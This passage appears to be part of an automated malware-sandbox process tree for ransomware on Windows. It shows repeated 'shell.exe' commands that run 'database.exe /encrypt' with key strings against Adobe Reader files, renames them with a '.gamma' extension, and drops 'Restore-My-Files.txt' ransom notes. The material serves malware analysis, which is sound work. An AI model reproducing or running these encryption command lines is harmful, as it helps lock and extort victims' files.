                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 248
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                          PID:7372
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:7376
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:3576
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 248
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                PID:796
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                  PID:6024
                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:3924
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3924 -s 248
                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                                                                                                                      PID:7328
                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                                        PID:7356
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2448
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                          PID:2828
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:6412
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:3244
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                              PID:4132
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 248
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                                                                                                                                                PID:2952
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5844
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:7004
                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:4352
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:5780
                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:3748
                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:5672
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                          PID:2564
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\engphon.env.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:764
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:3484
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                              PID:988
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:5008
                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:4892
                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:6368
